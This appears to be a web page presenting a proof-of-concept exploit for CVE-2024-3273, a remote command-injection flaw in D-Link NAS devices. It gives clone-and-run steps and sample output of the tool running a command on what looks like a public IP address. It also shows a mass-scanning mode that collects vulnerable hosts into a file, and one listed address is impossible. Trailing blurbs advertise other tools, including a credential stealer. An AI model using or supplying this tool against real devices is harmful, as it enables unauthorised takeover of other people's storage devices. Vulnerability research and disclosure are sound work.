This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.
The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi
endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
requests
librarygit clone https://github.com/adhikara13/CVE-2024-3273.git
2. Navigate to the repository directory:
cd CVE-2024-3273
3. Run the PoC:
python main.py
4. Follow the on-screen instructions to choose the target device:
host:port
, and choose whether to export vulnerable hosts to vulnerables.txt
.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…